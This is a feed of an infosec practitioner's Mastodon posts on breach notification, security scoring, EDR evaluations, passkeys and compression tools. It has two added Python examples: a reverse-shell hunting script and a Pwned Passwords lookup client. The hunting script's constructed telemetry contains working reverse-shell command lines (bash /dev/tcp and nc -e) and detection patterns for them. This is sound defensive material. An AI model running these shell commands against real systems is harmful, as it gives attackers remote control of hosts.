Interesting to see @haveibeenpwned / @troyhunt having decided to start offering "Threat Intelligence".
While I understand the thinking, the quote from the article:
> But even when you get the full dump of the data from the shadiest providers*, it's just been a waste of time.
Sure, there is some value in informing people about problems. But it's important to provide actionable information.
A better approach might be to provide this information to the breached sites to allow them to 1. validate the information, 2. inform the users, and 3. force changes.
That approach has its own problems**, but it seems like it more effectively attacks the core of the problem instead of the symptom.
And if that is not possible, then maybe something proactive like identity-protection services which you pay to take action on your behalf.
Maybe this isn't something Troy wants to do, which is fine. But I felt like I needed to write down my thoughts on why I don't think it's the right approach.
Footnotes:
Rate my #homeassistant - dashboard
It's getting there, slowly. Running on my old trusty iPad2. Getting that to work took a bit of trickery as the HS dashboard required modern JS, but #novnc to the rescue. I'll write it up soon.
Oh fantastic to hear @riskybusiness and @metlstorm say it out loud.
Securityscorecard and similar scoring services are a very coarse proxy for the state of security at a company.
I recently spent many emails and meetings trying to explain to a customer why our low score, due mostly to a few services accepting older TLS versions and missing security HTTP headers, is not a sign we don't take security seriously. And that the outdated version of software A (which we have many of, and which was a big contributor to the low score), while not optimal, is not a priority because of how we use it and the mitigations we have in place.
In the end it was easier to remove the version from the header than to get them to accept that the security scoring service was wrong in this case.
Also the whole business of how they force you to get a proper view of why your score is bad does not seem like an ethical business practice either.
https://overcast.fm/+AAIt0hlU9MU/24:49
Random thought which hit me some days ago:
A strong driver of complexity is that it hides incompetence.
It's probably not a novel idea but I feel it explains so much of what is happening in this field.
It's probably something @ludicity wrote which my subconscious has been processing.
https://securitycryptographywhatever.com/ is the most approachable cryptography podcast I know. Here are my favourite episodes:
* What's wrong with JWT and what to use instead, with @titanous: https://overcast.fm/+AAxz8XW2b7M
* The non-marketing take on Zero Trust, with @konklone: https://overcast.fm/+AAxz8X8qQgQ
* Software Safety, with @kevinriggle: https://overcast.fm/+AAxz8VogJiY
* SOC2, with @worldwise001: https://overcast.fm/+AAxz8Vrq84s
A key part of me keeping my social media usage healthy and enjoyable is a chronological timeline which remembers where I left off.
Instead of scrolling down towards infinity I scroll up towards now. I also find that makes it much easier to follow the development of news and discussions.
Also no notifications, or if you must, make them go into the summary.
And unfollow/mute aggressively, unless you're getting joy from social media, why do you do it?
#mastodon #mentalhealth #life
Ugh, the #chrome #extension ecosystem is exactly as bad as I'd expect.
And the fact that the extension is still up, claiming not to collect any data even after it has been called out in one of the biggest security newsletters, shows how much Google cares about this (not much). The only thing they care about is pretending to ship AI features to detect malicious extensions. Because that's how you get promoted.
I mean, is it even possible to report a suspicious or bad extension? I don't see it anywhere.
Great research by @WPalant and @c0m4r
And @campuscodi for putting the spotlight on it.
The #mitre #engenuity ATT&CK evaluation project is super interesting and well done.
I'm looking at Linux EDR solutions, and there seems to be very little info out there about how they perform. But this is a great source of info after you figure out how it works, and it really shows how the tools work.
For example, take a look here, a comparison of Fortinet, CrowdStrike and Palo Alto. To help you understand what you are looking at, and to keep the focus on Linux for now, start by unchecking all the steps before 9.7 (which will limit it to Linux).
Now in the summary, you will see a lot of purple. Purple means the EDR saw the activity.
This is somewhat interesting: most are quite good at finding things. But what I find to be really interesting is when you scroll down, you can see screenshots of the activity as it shows up in the EDR console. I find this the real value, as it gives a rare glimpse into how different solutions present the information, because I think this is a key part of how useful software is. An EDR will by definition collect much more info than it needs, and then the important part becomes presenting the information in a usable way that allows the end user (threat hunter) to quickly figure out if something is malicious or not.
Blocking or alerting on it is of course the other important thing, and that is not tested in this Scenario (more on that in a moment). But I think the screenshots give an idea for most of the products if it would have been an alert.
For example, this one is interesting to look at:
(Linux) cron executes a reverse shell to 176.59.15.33:8081
For Fortinet, they are only showing the Threat Hunting view, so it is hard to tell if FortiEDR has generated an alert or not, and with what severity.
#linux #edr #mitre #engenuity
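To make concrete what a threat hunter is looking for in that evaluation step (a shell spawned under cron that connects back to 176.59.15.33:8081), here is an added example of the kind of detection logic an analyst might run over process-execution telemetry. It is not code from the page, from MITRE Engenuity, or from any of the EDR vendors mentioned; the process events are constructed for the example, and the reverse-shell patterns are a small illustrative set, not a vendor's rule base.

```python
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    """One process-start event as an EDR would record it (constructed schema)."""
    pid: int
    ppid: int
    exe: str
    cmdline: str
    user: str


# Constructed telemetry: a cron job spawning a bash reverse shell to the
# address from the evaluation step, a benign cron job, and a user-launched nc.
CONSTRUCTED_EVENTS = [
    ProcEvent(1, 0, "/sbin/init", "/sbin/init", "root"),
    ProcEvent(600, 1, "/usr/sbin/cron", "/usr/sbin/cron -f", "root"),
    ProcEvent(4101, 600, "/usr/sbin/cron", "/usr/sbin/CRON", "root"),
    ProcEvent(4102, 4101, "/bin/sh",
              "/bin/sh -c bash -i >& /dev/tcp/176.59.15.33/8081 0>&1", "root"),
    ProcEvent(4103, 4102, "/bin/bash", "bash -i", "root"),
    ProcEvent(4200, 600, "/usr/sbin/cron", "/usr/sbin/CRON", "root"),
    ProcEvent(4201, 4200, "/bin/sh",
              "/bin/sh -c /usr/bin/logrotate /etc/logrotate.conf", "root"),
    ProcEvent(5000, 1, "/bin/bash", "bash -i", "alice"),
    ProcEvent(5001, 5000, "/usr/bin/nc", "nc -e /bin/sh 10.0.0.5 4444", "alice"),
]

# Illustrative reverse-shell indicators: bash /dev/tcp redirection, nc -e, socat exec.
REVERSE_SHELL_PATTERNS = [
    re.compile(r"/dev/(?:tcp|udp)/(?P<host>\d{1,3}(?:\.\d{1,3}){3})/(?P<port>\d{1,5})"),
    re.compile(r"\bnc(?:at)?\b.*\s-e\s"),
    re.compile(r"\bsocat\b.*\bexec:", re.IGNORECASE),
]
# Fallback to pull "host port" out of commands like "nc -e /bin/sh 10.0.0.5 4444".
HOST_PORT_FALLBACK = re.compile(r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d{1,5})\b")
SCHEDULERS = {"cron", "crond", "anacron", "atd"}


def ancestors(event: ProcEvent, by_pid: Dict[int, ProcEvent], max_depth: int = 16) -> List[ProcEvent]:
    """Walk the parent chain upward (bounded, so a broken ppid loop cannot hang us)."""
    chain: List[ProcEvent] = []
    cur = by_pid.get(event.ppid)
    while cur is not None and len(chain) < max_depth:
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def spawned_by_scheduler(event: ProcEvent, by_pid: Dict[int, ProcEvent]) -> bool:
    """True if cron/at or similar appears anywhere in the process ancestry."""
    return any(os.path.basename(a.exe) in SCHEDULERS for a in ancestors(event, by_pid))


def reverse_shell_dest(cmdline: str) -> Optional[str]:
    """Return 'host:port' if the command line looks like a reverse shell, else None."""
    if not any(p.search(cmdline) for p in REVERSE_SHELL_PATTERNS):
        return None
    m = REVERSE_SHELL_PATTERNS[0].search(cmdline) or HOST_PORT_FALLBACK.search(cmdline)
    return f"{m['host']}:{m['port']}" if m else "unknown"


def hunt(events: List[ProcEvent]) -> List[dict]:
    """Flag reverse-shell-looking commands; cron ancestry raises the severity."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        dest = reverse_shell_dest(e.cmdline)
        if dest is None:
            continue
        from_scheduler = spawned_by_scheduler(e, by_pid)
        findings.append({
            "pid": e.pid,
            "user": e.user,
            "dest": dest,
            "from_scheduler": from_scheduler,
            "severity": "high" if from_scheduler else "medium",
            "ancestry": [a.pid for a in ancestors(e, by_pid)],
            "cmdline": e.cmdline,
        })
    return findings


if __name__ == "__main__":
    for f in hunt(CONSTRUCTED_EVENTS):
        print(f"[{f['severity']}] pid={f['pid']} user={f['user']} -> {f['dest']} "
              f"ancestry={f['ancestry']} cmd={f['cmdline']!r}")
```

The interesting design point is the ancestry walk: the command line alone tells you "someone opened a reverse shell", but whether the parent chain leads back to cron is what turns a medium-severity finding into the high-severity "persistence plus C2" story the evaluation step describes, and it is exactly the piece of context a console either surfaces in one glance or buries three clicks deep.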
I was really hopeful when I saw the news about this. But after reading the list of restrictions on a "Teen" account I couldn't stop thinking about the likeness to the tobacco companies campaigns with "Light" and "Low-Nicotine".
Facebook/Meta introduces ~Camel Light~ Instagram Teen; it's the healthy choice that doctors recommend.
https://about.fb.com/news/2024/09/instagram-teen-accounts/
#instagram #totallynottobacco
@things is Apple's cloud syncing really so much worse than doing it yourself?
I like everything about your app, but the fact that you have your own syncing is a killer for me. I just don't see how a small company like yours would be able to assign enough resources to protect the data, and even if the risk is small there are 100 other todo apps out there which do not have this risk, so I'll just have to pass for now.
Seems like outsourcing that part to Apple would be a win-win and allow you to focus on the app, not the servers.
I'm apparently not alone in doing this... feels silly, but I'd rather miss out on some new features than have an app change/break silently with no way for me to roll back...
https://mjtsai.com/blog/2024/07/18/overcasts-new-foundation/
Also I'm curious, the "unimplemented old features" wouldn't be one tap play would it?
@mjtsai
Anyone have recommendations for durable dog toys? Preferably natural materials.
I've only managed to find one or two in local stores, so now I ordered a bunch all the way from Austria, from a company called GogiPet who had good marketing about being natural materials and such.
But the first one seems to be the same stuff as everything else; it looks like it's starting to break open after she played with it for 15 minutes.
They had more sturdy looking things also which I'll let her test at some other point, but I'd love to find a company that just makes good stuff.
#mastodogs
OK, found a blog post explaining it; from my reading it's equally good (or bad) as the Apple one.
So I'm going to put in the #passwordpolicy that synced passkeys are OK.
But I'd love for someone with real experience extracting/stealing these to tell me why I'm wrong about this and why it'll get us hacked.
How well are #Passkeys protected on Android / Google Password Manager?
According to this article, on Mac/iOS it relies on the Keychain, and on Hello on Windows. While not perfect, it feels like it would offer some resistance against stealers, where they would at least need to prompt the user vs. silently being able to extract them?
But how about #Android and #malware ? I would assume it's equally well protected but I can't find any information.
Has anyone made, or know of, a tool to check if a Twitter account has moved to or has profiles on any of the other social media places?
Every now and then I find a Twitter account I'd like to follow, but I don't use Xitter anymore.
So I manually open Mastodon, BlueSky and Threads to check if they have accounts, which is kind of a pain. I was thinking there should be an #OSINT tool which would provide some faster way to search all of them?
None of the ones I found by quickly searching seemed to support these newer networks.
#mastohelp
I was also going to say use zstd if you have the choice... but then I found an interesting benchmark which, as far as I read it, shows igzip being faster while giving very similar compression levels on that test case, which is a 100 MiB HTML file.
so I might have to revise my standard "use #zstd" to "use #igzip"
not yet though, need to do a bit more benchmarking and dog-fooding igzip
Also don't miss igzip, available for most distros and OSes, which gives 2x single-core performance "for free".
PSA: If you need lots of gzipped data decompressed, the limiting factor has usually been the single-threadedness of gzip.
For compression, pigz has been around for a while, and it seems someone has finally figured out parallel decompression.
First pugz did text, and now rapidgzip.
Now the slow spinning disks are the problem, not the CPU.
#gzip #parallel
@troyhunt is there some way for me to submit hashes of additional known compromised passwords to the Pwned Passwords database?
I'm thinking I'd like to outsource all the bad-password checks to the Pwned Passwords API, and not all our known bad or leaked passwords are in the public leaks which have been imported.
I'm not sure if this is actually a good idea or scalable, so I'm curious to hear your thoughts on this?
Another benefit from this would be that any SaaS provider we use that checks against the API would automatically blacklist all our bad passwords also.
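For readers who have not looked at how the Pwned Passwords check works in practice, here is an added example (not code from the page, nor from Have I Been Pwned) of the k-anonymity range lookup the public API uses, with the organisation-specific denylist the post asks about merged in client-side instead of being submitted upstream. The range responses are constructed in-process so the example runs offline; the real endpoint is https://api.pwnedpasswords.com/range/<first five hex chars of the SHA-1>, which returns one "SUFFIX:COUNT" line per matching hash, and the `fetch_range` callable is the seam where a real HTTP call would go.

```python
import hashlib
from collections import defaultdict
from typing import Callable, Dict, Iterable


def sha1_hex(password: str) -> str:
    """Uppercase hex SHA-1, which is what Pwned Passwords is keyed on."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_hash(full_hash: str):
    """k-anonymity split: the 5-char prefix is sent, the 35-char suffix never leaves the client."""
    return full_hash[:5], full_hash[5:]


def parse_range(body: str) -> Dict[str, int]:
    """Parse a range response: one 'SUFFIX:COUNT' line per hash sharing the prefix."""
    counts: Dict[str, int] = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def pwned_count(password: str, fetch_range: Callable[[str], str]) -> int:
    """How many times the password appears in the dataset behind fetch_range (0 if absent)."""
    prefix, suffix = split_hash(sha1_hex(password))
    return parse_range(fetch_range(prefix)).get(suffix, 0)


class LocalDenylist:
    """Organisation-specific bad hashes, checked client-side (the post's idea, done locally)."""

    def __init__(self, full_hashes: Iterable[str]):
        self._by_prefix = defaultdict(set)
        for h in full_hashes:
            prefix, suffix = split_hash(h.upper())
            self._by_prefix[prefix].add(suffix)

    def contains(self, password: str) -> bool:
        prefix, suffix = split_hash(sha1_hex(password))
        return suffix in self._by_prefix.get(prefix, set())


def is_banned(password: str, fetch_range: Callable[[str], str],
              local: LocalDenylist, threshold: int = 1) -> bool:
    """Reject if on the local denylist, or seen at least `threshold` times upstream."""
    return local.contains(password) or pwned_count(password, fetch_range) >= threshold


# Constructed stand-in for the upstream dataset: made-up counts, hashed the same way.
_CONSTRUCTED_LEAK = {"password": 9659365, "letmein": 1, "correct horse battery staple": 3}


def _build_range_store() -> Dict[str, list]:
    store = defaultdict(list)
    for pw, count in _CONSTRUCTED_LEAK.items():
        prefix, suffix = split_hash(sha1_hex(pw))
        store[prefix].append(f"{suffix}:{count}")
    return store


_STORE = _build_range_store()


def fake_fetch_range(prefix: str) -> str:
    """Offline replacement for GET /range/<prefix>; same response shape as the real API."""
    return "\r\n".join(_STORE.get(prefix.upper(), []))


if __name__ == "__main__":
    # Hashes an organisation would keep for itself, e.g. from its own past incidents.
    local = LocalDenylist([sha1_hex("CompanyName2024!")])
    for pw in ("password", "CompanyName2024!", "a-long-and-unique-phrase"):
        print(f"{pw!r}: upstream={pwned_count(pw, fake_fetch_range)} "
              f"banned={is_banned(pw, fake_fetch_range, local)}")
```

Two things worth noting from the split: the server only ever sees a 5-hex-character prefix (one of 1,048,576 buckets), so the lookup leaks very little about the password, and a local denylist can be merged on the client with no change to the upstream service, which is one answer to the "submit our hashes" question if HIBP does not accept them. The real API also accepts an `Add-Padding: true` request header so that response sizes do not reveal how many hashes share a prefix; that is worth sending from a real client.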
Posts from gnyman@infosec.exchange (content proxied by September).